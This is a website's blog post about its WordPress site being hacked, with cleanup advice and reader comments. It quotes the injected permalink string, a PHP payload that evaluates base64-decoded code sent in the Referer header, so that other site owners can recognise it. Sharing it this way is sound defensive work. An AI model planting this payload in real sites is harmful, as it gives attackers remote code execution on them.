Our site hacked – solution posted

For the past several hours HD-Report was not working correctly due to a hack upon our site. A malicious URL string was placed at the end of each of our pages, which caused problems in linking to the pages as well as error messages.

HD-Report proudly runs on WordPress, however due the popularity of the open source platform it is frequently a target of hackers. We thought we would post this message to help out and warn other sites who may be vulnerable.

Brief overview:
Somehow a hacker was able to access the administration tools. A custom structure string coded as “/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/” was placed at the end of each permalink.

To fix you should first change your password. Then, delete suspected users who may be using the login “admin” or other name that looks suspicious. Third, go to the Permalinks options and reset to your preferred settings. You may notice the “Custom Structure” has the malicious string.

To avoid this from happening to your WordPress site, update to the latest version 2.8, be careful of new users, and backup your files frequently!

Here are a couple links to the WordPress forum which go into the issue in more detail:

http://wordpress.org/support/topic/307588
http://wordpress.org/support/topic/307518

Share this post

PinIt
hdreport

hdreport

HD Report provides news, commentary, and information about 4k & HD channels, programming, digital media, Blu-ray, video gaming, and more. Find us on Google+, Facebook, and Twitter.

3 Replies to “Our site hacked – solution posted”

  1. stevenB says:

    I thought that was an over-hyped at the time, until many sites starting getting hacked. In the last couple of weeks it has been happening a lot.

  2. Josh says:

    We were also hacked. Check your uploads directory–you’ll most likely find a series of new folders there, probably buried in year and month folders, containing websites selling pharmaceuticals and warez.

  3. Seamus Peterstein says:

    Sucks man. You should report them to Interpol.

Leave a Reply

Your email address will not be published. Required fields are marked *

scroll to top